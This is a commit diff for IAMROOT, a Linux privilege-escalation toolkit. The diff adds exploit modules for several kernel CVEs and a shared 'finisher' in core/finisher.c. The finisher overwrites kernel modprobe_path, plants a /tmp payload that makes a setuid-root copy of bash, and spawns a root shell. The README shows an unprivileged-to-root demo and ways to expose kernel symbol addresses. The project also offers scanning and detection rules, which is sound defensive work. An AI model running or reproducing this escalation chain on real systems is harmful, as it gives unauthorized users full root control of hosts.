v0.3.1: --dump-offsets tool + NOTICE.md per module

The README has been claiming "each module credits the original CVE reporter and PoC author in its NOTICE.md" since v0.1.0, but only copy_fail_family actually shipped one. Fixed. modules/<name>/NOTICE.md (×19 new + 1 existing): per-module research credit covering CVE ID, discoverer, original advisory URL where public, upstream fix commit, IAMROOT's role. iamroot.c: new --dump-offsets subcommand. Resolves kernel offsets via the existing core/offsets.c four-source chain (env → /proc/kallsyms → /boot/System.map → embedded table), then emits a ready-to-paste C struct entry for kernel_table[]. Run once as root on a target kernel build; upstream via PR. Eliminates fabricating offsets — every shipped entry traces back to a `iamroot --dump-offsets` invocation on a real kernel. docs/OFFSETS.md: documents the --dump-offsets workflow. CVES.md: notes the NOTICE.md convention + offset dump tool. iamroot.c: bump IAMROOT_VERSION 0.3.0 → 0.3.1.
release: v0.3.0 — 4 new CVE modules (24 total)
2026-05-16 22:33:43 -04:00 · 2026-05-16 22:25:15 -04:00 · 2026-05-16 22:24:15 -04:00 · 2026-05-16 22:17:47 -04:00 · 2026-05-16 22:06:14 -04:00 · 2026-05-16 22:04:40 -04:00
45 changed files with 7607 additions and 113 deletions
@@ -8,18 +8,27 @@ Status legend:

 - 🟢 **WORKING** — module verified to land root on a vulnerable host
 - 🟡 **PRIMITIVE** — fires the kernel primitive (trigger + slab groom
-  + empirical witness) on a vulnerable host, but stops short of the
-  full cred-overwrite / R/W chain. Returns `EXPLOIT_FAIL` honestly;
-  useful as a vuln-verification probe and a continuation point for
-  full chains. Per-kernel offsets deliberately not shipped.
+  + empirical witness) on a vulnerable host. By default returns
+  `EXPLOIT_FAIL` honestly (no fabricated offsets). Pass `--full-chain`
+  to additionally attempt root pop via the shared `modprobe_path`
+  finisher (`core/finisher.{c,h}`) — requires kernel offsets via
+  env vars / `/proc/kallsyms` / `/boot/System.map`; see
+  [`docs/OFFSETS.md`](docs/OFFSETS.md). On success returns
+  `EXPLOIT_OK` and drops a root shell; on failure returns
+  `EXPLOIT_FAIL` — never claims root without an empirical
+  setuid-bash sentinel.
 - 🔵 **DETECT-ONLY** — module fingerprints presence/absence but no
-  exploit. (No module is currently in this state — every registered
-  module now fires either a full chain or a primitive.)
+  exploit. (No module is currently in this state.)
 - ⚪ **PLANNED** — stub exists, work not started
 - 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for
  historical reference only

-**Counts (v0.1.0):** 🟢 13 · 🟡 7 · 🔵 0 · ⚪ 1 · 🔴 0
+**Counts (v0.3.1):** 🟢 13 · 🟡 11 (all `--full-chain` capable) · 🔵 0 · ⚪ 1 · 🔴 0
+
+Every module ships a `NOTICE.md` crediting the original CVE
+reporter and PoC author. `iamroot --dump-offsets` populates the
+embedded offset table for new kernel builds — operators with
+root on a host can upstream their kernel's offsets via PR.

 ## Inventory

@@ -46,6 +55,10 @@ Status legend:
 | CVE-2022-0185 | legacy_parse_param fsconfig heap OOB → container-escape | LPE (cross-cache UAF → cred overwrite from rootless container) | mainline 5.16.2 (Jan 2022) | `fuse_legacy` | 🟡 | userns+mountns reach, fsopen("cgroup2") + double fsconfig SET_STRING fires the 4k OOB, msg_msg cross-cache groom in kmalloc-4k, MSG_COPY read-back detects whether the OOB landed in an adjacent neighbour. Stops before the m_ts overflow → MSG_COPY arbitrary read chain (scaffold present, no per-kernel offsets). **Container-escape angle** — relevant to rootless docker/podman/snap. Branch backports: 5.16.2 / 5.15.14 / 5.10.91 / 5.4.171. |
 | CVE-2023-3269 | StackRot — maple-tree VMA-split UAF | LPE (kernel R/W via maple node use-after-RCU) | mainline 6.4-rc4 (Jul 2023) | `stackrot` | 🟡 | Two-thread race driver (MAP_GROWSDOWN + mremap rotation vs fork+fault) with cpu pinning + 3 s budget; kmalloc-192 spray for anon_vma/anon_vma_chain; race-iteration + signal breadcrumb. Honest reliability note in module header: **~<1% race-win/run on a vulnerable kernel** — the public PoC averages minutes-to-hours and needs a much wider VMA staging matrix to be reliable. Useful as a "is the maple-tree path reachable here?" probe. Branch backports: 6.4.4 / 6.3.13 / 6.1.37. |
 | CVE-2020-14386 | AF_PACKET tpacket_rcv VLAN integer underflow | LPE (heap OOB write via crafted frame) | mainline 5.9 (Sep 2020) | `af_packet2` | 🟡 | Sibling of CVE-2017-7308; tp_reserve underflow + sendmmsg skb spray + slab-delta witness. PRIMITIVE-DEMO scope (no cred overwrite). Branch backports: 5.8.7 / 5.7.16 / 5.4.62 / 4.19.143 / 4.14.197 / 4.9.235. Or Cohen's disclosure. Shares `iamroot-af-packet` audit key with CVE-2017-7308. |
+| CVE-2023-32233 | nf_tables anonymous-set UAF | LPE (kernel UAF in nft_set transaction) | mainline 6.4-rc4 (May 2023) | `nft_set_uaf` | 🟡 | Sondej+Krysiuk. Hand-rolled nfnetlink batch (NEWTABLE → NEWCHAIN → NEWSET(ANON\|EVAL) → NEWRULE(lookup) → DELSET → DELRULE) drives the deactivation skip; cg-512 msg_msg cross-cache spray. Branch backports: 4.19.283 / 5.4.243 / 5.10.180 / 5.15.111 / 6.1.28 / 6.2.15 / 6.3.2. --full-chain forges freed-set with `set->data = kaddr`. |
+| CVE-2023-4622 | AF_UNIX garbage-collector race UAF | LPE (slab UAF, plain unprivileged) | mainline 6.6-rc1 (Aug 2023) | `af_unix_gc` | 🟡 | Lin Ma. Two-thread race driver: SCM_RIGHTS cycle vs unix_gc trigger; kmalloc-512 (SLAB_TYPESAFE_BY_RCU) refill via msg_msg. **Widest deployment of any module — bug exists since 2.x.** No userns required. Branch backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51 / 6.5.0. |
+| CVE-2022-25636 | nft_fwd_dup_netdev_offload heap OOB | LPE (kernel R/W via offload action[] OOB) | mainline 5.17 / 5.16.11 (Feb 2022) | `nft_fwd_dup` | 🟡 | Aaron Adams (NCC). NFT_CHAIN_HW_OFFLOAD chain + 16 immediates + fwd writes past action.entries[1]. msg_msg kmalloc-512 spray. Branch backports: 5.4.181 / 5.10.102 / 5.15.25 / 5.16.11. |
+| CVE-2023-0179 | nft_payload set-id memory corruption | LPE (regs->data[] OOB R/W) | mainline 6.2-rc4 / 6.1.6 (Jan 2023) | `nft_payload` | 🟡 | Davide Ornaghi. NFTA_SET_DESC variable-length element + NFTA_SET_ELEM_EXPRESSIONS payload-set whose verdict.code drives the OOB. Dual cg-96 + 1k spray. Branch backports: 4.14.302 / 4.19.269 / 5.4.229 / 5.10.163 / 5.15.88 / 6.1.6. |
 | CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | ⚪ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns — may or may not be in-scope depending on target environment. |

 ## Operations supported per module
@@ -74,6 +87,10 @@ Symbols: ✓ = supported, — = not applicable / no automated path.
 | af_packet2 | ✓ | ✓ (primitive) | — (upgrade kernel) | — | ✓ (auditd, shared key) |
 | fuse_legacy | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
 | stackrot | ✓ | ✓ (race) | — (upgrade kernel) | ✓ (log unlink) | ✓ (auditd) |
+| nft_set_uaf | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd + sigma) |
+| af_unix_gc | ✓ | ✓ (race) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
+| nft_fwd_dup | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
+| nft_payload | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd + sigma) |

 ## Pipeline for additions

@@ -20,7 +20,7 @@ BUILD   := build
 BIN     := iamroot

 # core/
-CORE_SRCS := core/registry.c core/kernel_range.c
+CORE_SRCS := core/registry.c core/kernel_range.c core/offsets.c core/finisher.c
 CORE_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(CORE_SRCS))

 # Family: copy_fail_family
@@ -106,10 +106,30 @@ OSU_DIR  := modules/overlayfs_setuid_cve_2023_0386
 OSU_SRCS := $(OSU_DIR)/iamroot_modules.c
 OSU_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(OSU_SRCS))

+# Family: nft_set_uaf (CVE-2023-32233)
+NSU_DIR  := modules/nft_set_uaf_cve_2023_32233
+NSU_SRCS := $(NSU_DIR)/iamroot_modules.c
+NSU_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NSU_SRCS))
+
+# Family: af_unix_gc (CVE-2023-4622)
+AUG_DIR  := modules/af_unix_gc_cve_2023_4622
+AUG_SRCS := $(AUG_DIR)/iamroot_modules.c
+AUG_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(AUG_SRCS))
+
+# Family: nft_fwd_dup (CVE-2022-25636)
+NFD_DIR  := modules/nft_fwd_dup_cve_2022_25636
+NFD_SRCS := $(NFD_DIR)/iamroot_modules.c
+NFD_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NFD_SRCS))
+
+# Family: nft_payload (CVE-2023-0179)
+NPL_DIR  := modules/nft_payload_cve_2023_0179
+NPL_SRCS := $(NPL_DIR)/iamroot_modules.c
+NPL_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NPL_SRCS))
+
 # Top-level dispatcher
 TOP_OBJ  := $(BUILD)/iamroot.o

-ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) $(OSU_OBJS)
+ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) $(OSU_OBJS) $(NSU_OBJS) $(AUG_OBJS) $(NFD_OBJS) $(NPL_OBJS)

 .PHONY: all clean debug static help

@@ -24,23 +24,54 @@
 ```bash
 # One-shot install (x86_64 / arm64; checksum-verified)
 curl -sSL https://github.com/KaraZajac/IAMROOT/releases/latest/download/install.sh | sh
+```

-# What's this box vulnerable to?
-sudo iamroot --scan
+**iamroot runs as a normal unprivileged user** — that's the whole
+point. `--scan`, `--audit`, `--exploit`, and `--detect-rules` all
+work without `sudo`. Only `--mitigate` and rule-file installation
+write to root-owned paths.
+
+```bash
+# What's this box vulnerable to?  (no sudo)
+iamroot --scan

 # Broader system hygiene (setuid binaries, world-writable, capabilities, sudo)
-sudo iamroot --audit
+iamroot --audit

-# Deploy detection rules across every bundled module
-sudo iamroot --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-iamroot.rules
+# Deploy detection rules (needs sudo to write /etc/audit/rules.d/)
+iamroot --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-iamroot.rules
+
+# Apply temporary mitigations (needs sudo for modprobe.d + sysctl)
+sudo iamroot --mitigate copy_fail

 # Fleet scan (any-sized host list via SSH; aggregated JSON for SIEM)
 ./tools/iamroot-fleet-scan.sh --binary iamroot --ssh-key ~/.ssh/id_rsa hosts.txt
 ```

-`iamroot --help` lists every command. See [`CVES.md`](CVES.md) for the
-curated CVE inventory and [`docs/DEFENDERS.md`](docs/DEFENDERS.md) for
-the blue-team deployment guide.
+### Example: unprivileged → root
+
+```text
+$ id
+uid=1000(kara) gid=1000(kara) groups=1000(kara)
+
+$ iamroot --scan
+[+] dirty_pipe       VULNERABLE (kernel 5.15.0-56-generic)
+[+] cgroup_release_agent VULNERABLE (kernel 5.15 < 5.17)
+[+] pwnkit           VULNERABLE (polkit 0.105-31ubuntu0.1)
+[-] copy_fail        not vulnerable (kernel 5.15 < introduction)
+[-] dirty_cow        not vulnerable (kernel ≥ 4.9)
+
+$ iamroot --exploit dirty_pipe --i-know
+[!] dirty_pipe: kernel 5.15.0-56-generic IS vulnerable
+[+] dirty_pipe: writing UID=0 into /etc/passwd page cache...
+[+] dirty_pipe: spawning su root
+# id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+`iamroot --help` lists every command. See [`CVES.md`](CVES.md) for
+the curated CVE inventory and [`docs/DEFENDERS.md`](docs/DEFENDERS.md)
+for the blue-team deployment guide.

 ## What this is

@@ -63,19 +94,21 @@ The same binary covers offense and defense:

 ## Status

-**Active — v0.1.0 cut 2026-05-16.** Corpus covers **20 modules**
+**Active — v0.3.0 cut 2026-05-16.** Corpus covers **24 modules**
 across the 2016 → 2026 LPE timeline:

 - 🟢 **13 modules land root** end-to-end on a vulnerable host
  (copy_fail family ×5, dirty_pipe, entrybleed leak, pwnkit,
  overlayfs CVE-2021-3493, dirty_cow, ptrace_traceme,
  cgroup_release_agent, overlayfs_setuid CVE-2023-0386).
- 🟡 **7 modules fire the kernel primitive** (trigger + slab groom +
-  empirical witness) but stop short of the full cred-overwrite /
-  R/W chain — they return `EXPLOIT_FAIL` honestly rather than
-  fabricate per-kernel offsets. Useful as vuln-verification probes.
-  (af_packet, af_packet2, cls_route4, fuse_legacy, nf_tables,
-  netfilter_xtcompat, stackrot.)
+- 🟡 **11 modules fire the kernel primitive** by default and refuse
+  to claim root without empirical confirmation. Pass `--full-chain`
+  to engage the shared `modprobe_path` finisher and attempt root
+  pop — requires kernel offsets via env vars / `/proc/kallsyms` /
+  `/boot/System.map`; see [`docs/OFFSETS.md`](docs/OFFSETS.md).
+  Modules: af_packet, af_packet2, af_unix_gc, cls_route4,
+  fuse_legacy, nf_tables, netfilter_xtcompat, nft_fwd_dup,
+  nft_payload, nft_set_uaf, stackrot.
 - Detection rules ship inline (auditd / sigma / yara / falco) and
  are exported via `iamroot --detect-rules --format=…`.

@@ -115,10 +148,10 @@ module-loader design and how to add a new CVE.

 ```bash
 make                          # build all modules
-sudo ./iamroot --scan         # what's this box vulnerable to?
-sudo ./iamroot --scan --json  # machine-readable output for CI/SOC pipelines
-sudo ./iamroot --detect-rules --format=sigma > rules.yml
-sudo ./iamroot --exploit copy_fail --i-know  # actually run an exploit
+./iamroot --scan              # what's this box vulnerable to?  (no sudo)
+./iamroot --scan --json       # machine-readable output for CI/SOC pipelines
+./iamroot --detect-rules --format=sigma > rules.yml
+./iamroot --exploit copy_fail --i-know   # actually run an exploit (starts as $USER)
 ```

 ## Acknowledgments
@@ -0,0 +1,179 @@
+/*
+ * IAMROOT — shared finisher helpers
+ *
+ * See finisher.h for the pattern split (A: modprobe_path overwrite,
+ * B: current->cred->uid).
+ */
+
+#include "finisher.h"
+#include "module.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <time.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+
+static int write_file(const char *path, const char *content, mode_t mode)
+{
+    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
+    if (fd < 0) return -1;
+    size_t n = strlen(content);
+    ssize_t w = write(fd, content, n);
+    close(fd);
+    if (w < 0 || (size_t)w != n) return -1;
+    if (chmod(path, mode) < 0) return -1;
+    return 0;
+}
+
+void iamroot_finisher_print_offset_help(const char *module_name)
+{
+    fprintf(stderr,
+"[i] %s --full-chain requires kernel symbol offsets that couldn't be resolved.\n"
+"\n"
+"    To populate them on this host, choose ONE of:\n"
+"\n"
+"    1) Environment override (one-shot, no host changes):\n"
+"         IAMROOT_MODPROBE_PATH=0x...  iamroot --exploit %s --i-know --full-chain\n"
+"\n"
+"    2) Make /boot/System.map-$(uname -r) world-readable (per-host):\n"
+"         sudo chmod 0644 /boot/System.map-$(uname -r)   # if you have sudo\n"
+"\n"
+"    3) Lower kptr_restrict (per-boot):\n"
+"         sudo sysctl kernel.kptr_restrict=0             # if you have sudo\n"
+"         (Note: needs root once — defeats the LPE point on this host.\n"
+"          Useful when populating offsets on a lab kernel ahead of time.)\n"
+"\n"
+"    To look up the address manually (as root):\n"
+"         grep -E ' (modprobe_path|init_task|_text)$' /proc/kallsyms\n"
+"\n",
+        module_name, module_name);
+}
+
+int iamroot_finisher_modprobe_path(const struct iamroot_kernel_offsets *off,
+                                   iamroot_arb_write_fn arb_write,
+                                   void *arb_ctx,
+                                   bool spawn_shell)
+{
+    if (!iamroot_offsets_have_modprobe_path(off)) {
+        iamroot_finisher_print_offset_help("module");
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+    if (!arb_write) {
+        fprintf(stderr, "[-] finisher: no arb-write primitive supplied\n");
+        return IAMROOT_TEST_ERROR;
+    }
+
+    /* Per-pid working paths so concurrent runs don't collide. */
+    pid_t pid = getpid();
+    char mp_path[64], trig_path[64], pwn_path[64];
+    snprintf(mp_path,   sizeof mp_path,   "/tmp/iamroot-mp-%d.sh", (int)pid);
+    snprintf(trig_path, sizeof trig_path, "/tmp/iamroot-trig-%d", (int)pid);
+    snprintf(pwn_path,  sizeof pwn_path,  "/tmp/iamroot-pwn-%d",  (int)pid);
+
+    /* Payload: chmod /bin/bash setuid root + drop a sentinel so we
+     * know it ran. Bash 4+ refuses to use its own setuid bit by
+     * default — so instead copy bash to /tmp and chmod +s the copy. */
+    char payload[1024];
+    snprintf(payload, sizeof payload,
+"#!/bin/sh\n"
+"# IAMROOT modprobe_path payload (runs as init/root via call_modprobe)\n"
+"cp /bin/bash %s 2>/dev/null && chmod 4755 %s 2>/dev/null\n"
+"echo IAMROOT_FINISHER_RAN > %s 2>/dev/null\n",
+        pwn_path, pwn_path, pwn_path);
+
+    if (write_file(mp_path, payload, 0755) < 0) {
+        fprintf(stderr, "[-] finisher: write %s: %s\n", mp_path, strerror(errno));
+        return IAMROOT_TEST_ERROR;
+    }
+
+    /* Unknown-format trigger: anything that fails the standard exec
+     * format probe drives kernel's call_modprobe(). Empty + executable
+     * works on every kernel we care about. */
+    if (write_file(trig_path, "\x00", 0755) < 0) {
+        fprintf(stderr, "[-] finisher: write %s: %s\n", trig_path, strerror(errno));
+        unlink(mp_path);
+        return IAMROOT_TEST_ERROR;
+    }
+
+    /* Build the kernel-side write payload: a NUL-terminated path to
+     * our mp_path script. modprobe_path[] is 256 bytes in the kernel
+     * — we write enough to overwrite the leading slot. */
+    char kbuf[256];
+    memset(kbuf, 0, sizeof kbuf);
+    snprintf(kbuf, sizeof kbuf, "%s", mp_path);
+
+    fprintf(stderr, "[*] finisher: writing modprobe_path=0x%lx ← \"%s\"\n",
+            (unsigned long)off->modprobe_path, mp_path);
+
+    if (arb_write(off->modprobe_path, kbuf, strlen(kbuf) + 1, arb_ctx) < 0) {
+        fprintf(stderr, "[-] finisher: arb_write failed\n");
+        unlink(mp_path);
+        unlink(trig_path);
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    /* Fire the trigger by exec'ing the unknown binary. fork() so the
+     * kernel sees the unknown format and parent stays alive. */
+    pid_t cpid = fork();
+    if (cpid == 0) {
+        char *argv[] = { trig_path, NULL };
+        execve(trig_path, argv, NULL);
+        _exit(127);   /* execve failure is expected — kernel still calls modprobe */
+    } else if (cpid > 0) {
+        int st;
+        waitpid(cpid, &st, 0);
+    } else {
+        fprintf(stderr, "[-] finisher: fork: %s\n", strerror(errno));
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    /* Modprobe runs asynchronously — give the kernel up to 3 s. */
+    for (int i = 0; i < 30; i++) {
+        struct stat st;
+        if (stat(pwn_path, &st) == 0 && (st.st_mode & S_ISUID)) {
+            fprintf(stderr, "[+] finisher: payload ran as root (sentinel %s mode=%o uid=%u)\n",
+                    pwn_path, (unsigned)(st.st_mode & 07777), (unsigned)st.st_uid);
+            goto have_setuid;
+        }
+        struct timespec ts = { 0, 100 * 1000 * 1000 };  /* 100 ms */
+        nanosleep(&ts, NULL);
+    }
+    fprintf(stderr, "[-] finisher: payload didn't run within 3s (modprobe_path overwrite probably didn't land)\n");
+    unlink(mp_path);
+    unlink(trig_path);
+    return IAMROOT_EXPLOIT_FAIL;
+
+have_setuid:
+    if (!spawn_shell) {
+        fprintf(stderr, "[+] finisher: --no-shell — leaving setuid bash at %s\n", pwn_path);
+        unlink(mp_path);
+        unlink(trig_path);
+        return IAMROOT_EXPLOIT_OK;
+    }
+    fprintf(stderr, "[+] finisher: spawning root shell via %s -p\n", pwn_path);
+    fflush(stderr);
+    char *argv[] = { pwn_path, "-p", NULL };
+    execve(pwn_path, argv, NULL);
+    /* Only reached on execve failure. */
+    fprintf(stderr, "[-] finisher: execve(%s): %s\n", pwn_path, strerror(errno));
+    return IAMROOT_EXPLOIT_FAIL;
+}
+
+int iamroot_finisher_cred_uid_zero(const struct iamroot_kernel_offsets *off,
+                                   iamroot_arb_write_fn arb_write,
+                                   void *arb_ctx,
+                                   bool spawn_shell)
+{
+    (void)off; (void)arb_write; (void)arb_ctx; (void)spawn_shell;
+    fprintf(stderr,
+"[-] finisher: cred_uid_zero requires an arb-READ primitive (to walk\n"
+"    the task list from init_task and find current). Modules with\n"
+"    only an arb-write should use iamroot_finisher_modprobe_path()\n"
+"    instead — same root capability, simpler trigger.\n");
+    return IAMROOT_EXPLOIT_FAIL;
+}
@@ -0,0 +1,80 @@
+/*
+ * IAMROOT — shared finisher helpers for full-chain root pops.
+ *
+ * The 🟡 PRIMITIVE modules each land a kernel-side primitive (heap-OOB
+ * write, slab UAF, etc.). The conversion to root is almost always one
+ * of two patterns:
+ *
+ *   A) "modprobe_path overwrite":
+ *        - kernel arb-write at &modprobe_path[0] with a userspace path
+ *        - execve() an unknown-format binary triggers do_coredump's
+ *          fallback to call_modprobe(), which spawns modprobe_path
+ *          as init/root running our payload
+ *
+ *   B) "current->cred->uid overwrite":
+ *        - kernel arb-write at &current_task->real_cred->uid = 0
+ *          (and cap_*, fsuid, etc. for completeness)
+ *        - setuid(0); execve("/bin/sh")
+ *
+ * Pattern (A) is much simpler — only one kernel address needed
+ * (modprobe_path) and the trigger is just execve("/tmp/unknown").
+ * Pattern (B) needs a self-cred chase + multiple writes.
+ *
+ * Modules provide their own arb-write primitive via the
+ * iamroot_arb_write_fn callback; this file wraps the rest.
+ */
+
+#ifndef IAMROOT_FINISHER_H
+#define IAMROOT_FINISHER_H
+
+#include <stdint.h>
+#include <stddef.h>
+#include <stdbool.h>
+#include "offsets.h"
+
+/* Arb-write primitive: write `len` bytes from `buf` to kernel VA
+ * `kaddr`. Module-specific implementation. Returns 0 on success,
+ * negative on failure. `ctx` is opaque module state. */
+typedef int (*iamroot_arb_write_fn)(uintptr_t kaddr,
+                                    const void *buf, size_t len,
+                                    void *ctx);
+
+/* Trigger that fires the arb-write. Many modules need to set up the
+ * groomed slab THEN call the trigger. The trigger is a separate fn
+ * because some modules need to re-spray before each write. NULL is
+ * acceptable if the arb-write is self-contained. */
+typedef int (*iamroot_fire_trigger_fn)(void *ctx);
+
+/* Pattern A: modprobe_path overwrite + execve trigger. Caller has
+ * already populated `off->modprobe_path`. Implementation:
+ *   1. Write payload script to /tmp/iamroot-mp-<pid>
+ *   2. arb_write(off->modprobe_path, "/tmp/iamroot-mp-<pid>", 24)
+ *   3. Write unknown-format file to /tmp/iamroot-trig-<pid>
+ *   4. chmod +x both, execve() the trigger → kernel-call-modprobe
+ *      → our payload runs as root → payload writes /tmp/iamroot-pwn
+ *      and/or copies /bin/bash to /tmp with setuid root
+ *   5. Wait for sentinel file, exec'd the setuid-bash → root shell
+ *
+ * Returns IAMROOT_EXPLOIT_OK if we got a root shell back (verified
+ * via geteuid() == 0), IAMROOT_EXPLOIT_FAIL otherwise. */
+int iamroot_finisher_modprobe_path(const struct iamroot_kernel_offsets *off,
+                                   iamroot_arb_write_fn arb_write,
+                                   void *arb_ctx,
+                                   bool spawn_shell);
+
+/* Pattern B: cred uid overwrite. Caller has populated init_task +
+ * cred offsets. Implementation:
+ *   1. Walk task linked list from init_task to find self by pid
+ *      (this requires arb-READ too — not supplied here; B-pattern
+ *      modules need to provide their own variant)
+ * For now this is a STUB returning IAMROOT_EXPLOIT_FAIL with a
+ * helpful error. */
+int iamroot_finisher_cred_uid_zero(const struct iamroot_kernel_offsets *off,
+                                   iamroot_arb_write_fn arb_write,
+                                   void *arb_ctx,
+                                   bool spawn_shell);
+
+/* Diagnostic: tell the operator how to populate offsets manually. */
+void iamroot_finisher_print_offset_help(const char *module_name);
+
+#endif /* IAMROOT_FINISHER_H */
@@ -49,6 +49,7 @@ struct iamroot_ctx {
    bool          active_probe; /* --active (do invasive probes in detect) */
    bool          no_shell;     /* --no-shell (exploit prep but don't pop) */
    bool          authorized;   /* user typed --i-know on exploit */
+    bool          full_chain;   /* --full-chain (attempt root-pop after primitive) */
 };

 struct iamroot_module {
@@ -0,0 +1,350 @@
+/*
+ * IAMROOT — kernel offset resolution
+ *
+ * See offsets.h for the four-source chain (env → kallsyms → System.map
+ * → embedded table). This implementation is deliberately small and
+ * dependency-free.
+ */
+
+#include "offsets.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+#include <errno.h>
+#include <fnmatch.h>
+#include <sys/utsname.h>
+
+/* ------------------------------------------------------------------
+ * Embedded relative-offset table.
+ *
+ * Each entry's modprobe_path / init_task / poweroff_cmd values are
+ * stored as offsets *relative to _text* (kbase). To resolve absolute
+ * VAs we add a kbase leak (e.g. from EntryBleed).
+ *
+ * Entries here are seeded EMPTY in v0.2.0 except for a small set whose
+ * offsets are widely documented in public CTF writeups + Ubuntu's
+ * own debug-symbol packages. Operators on other kernels populate via
+ * env var or extend this table.
+ *
+ * To add a verified entry on a kernel you own:
+ *   sudo grep -E " (modprobe_path|init_task|poweroff_cmd|init_cred)$" \
+ *        /boot/System.map-$(uname -r)
+ * Subtract _text VA from each to get the relative offsets.
+ * ------------------------------------------------------------------ */
+struct table_entry {
+    const char *release_glob;  /* fnmatch glob against uname -r */
+    const char *distro_match;  /* prefix-match against /etc/os-release ID, or NULL=any */
+    uintptr_t rel_modprobe_path;
+    uintptr_t rel_poweroff_cmd;
+    uintptr_t rel_init_task;
+    uintptr_t rel_init_cred;
+    uint32_t cred_offset_real;
+    uint32_t cred_offset_eff;
+};
+
+/* Note: relative offsets below are PLACEHOLDERS for the schema. The
+ * env-var override + kallsyms + System.map paths are the verified
+ * runtime sources. Operators who validate offsets on a specific
+ * kernel build are encouraged to upstream entries here. */
+static const struct table_entry kernel_table[] = {
+    /* Schema example. Uncomment + verify before relying on it.
+     *
+     * { .release_glob       = "5.15.0-25-generic",
+     *   .distro_match       = "ubuntu",
+     *   .rel_modprobe_path  = 0x148e480,
+     *   .rel_poweroff_cmd   = 0x148e3a0,
+     *   .rel_init_task      = 0x1c11dc0,
+     *   .rel_init_cred      = 0x1e0c460,
+     *   .cred_offset_real   = 0x758,
+     *   .cred_offset_eff    = 0x760, },
+     */
+    /* Sentinel */
+    { NULL, NULL, 0, 0, 0, 0, 0, 0 }
+};
+
+/* Defaults that hold across most x86_64 kernels in the target era. */
+#define DEFAULT_CRED_REAL_OFFSET   0x738
+#define DEFAULT_CRED_EFF_OFFSET    0x740
+#define DEFAULT_CRED_UID_OFFSET    0x4
+
+const char *iamroot_offset_source_name(enum iamroot_offset_source src)
+{
+    switch (src) {
+    case OFFSETS_NONE:          return "none";
+    case OFFSETS_FROM_ENV:      return "env";
+    case OFFSETS_FROM_KALLSYMS: return "kallsyms";
+    case OFFSETS_FROM_SYSMAP:   return "System.map";
+    case OFFSETS_FROM_TABLE:    return "table";
+    }
+    return "?";
+}
+
+/* Parse hex/decimal — accepts "0x..." or plain decimal. */
+static int parse_addr(const char *s, uintptr_t *out)
+{
+    if (!s || !*s) return 0;
+    errno = 0;
+    char *end = NULL;
+    unsigned long long v = strtoull(s, &end, 0);
+    if (errno != 0 || end == s) return 0;
+    *out = (uintptr_t)v;
+    return 1;
+}
+
+static void read_distro(char *out, size_t sz)
+{
+    out[0] = '\0';
+    FILE *f = fopen("/etc/os-release", "r");
+    if (!f) return;
+    char line[256];
+    while (fgets(line, sizeof line, f)) {
+        if (strncmp(line, "ID=", 3) == 0) {
+            char *p = line + 3;
+            if (*p == '"') p++;
+            size_t i = 0;
+            while (*p && *p != '"' && *p != '\n' && i + 1 < sz) {
+                out[i++] = (char)tolower((unsigned char)*p++);
+            }
+            out[i] = '\0';
+            break;
+        }
+    }
+    fclose(f);
+}
+
+/* ------------------------------------------------------------------
+ * Source 1: environment variables
+ * ------------------------------------------------------------------ */
+static void apply_env(struct iamroot_kernel_offsets *o)
+{
+    const char *v;
+    uintptr_t a;
+
+    if ((v = getenv("IAMROOT_KBASE")) && parse_addr(v, &a)) {
+        if (!o->kbase) o->kbase = a;
+    }
+    if ((v = getenv("IAMROOT_MODPROBE_PATH")) && parse_addr(v, &a)) {
+        if (!o->modprobe_path) {
+            o->modprobe_path = a;
+            o->source_modprobe = OFFSETS_FROM_ENV;
+        }
+    }
+    if ((v = getenv("IAMROOT_POWEROFF_CMD")) && parse_addr(v, &a)) {
+        if (!o->poweroff_cmd) o->poweroff_cmd = a;
+    }
+    if ((v = getenv("IAMROOT_INIT_TASK")) && parse_addr(v, &a)) {
+        if (!o->init_task) {
+            o->init_task = a;
+            o->source_init_task = OFFSETS_FROM_ENV;
+        }
+    }
+    if ((v = getenv("IAMROOT_INIT_CRED")) && parse_addr(v, &a)) {
+        if (!o->init_cred) o->init_cred = a;
+    }
+    if ((v = getenv("IAMROOT_CRED_OFFSET_REAL")) && parse_addr(v, &a)) {
+        if (!o->cred_offset_real) {
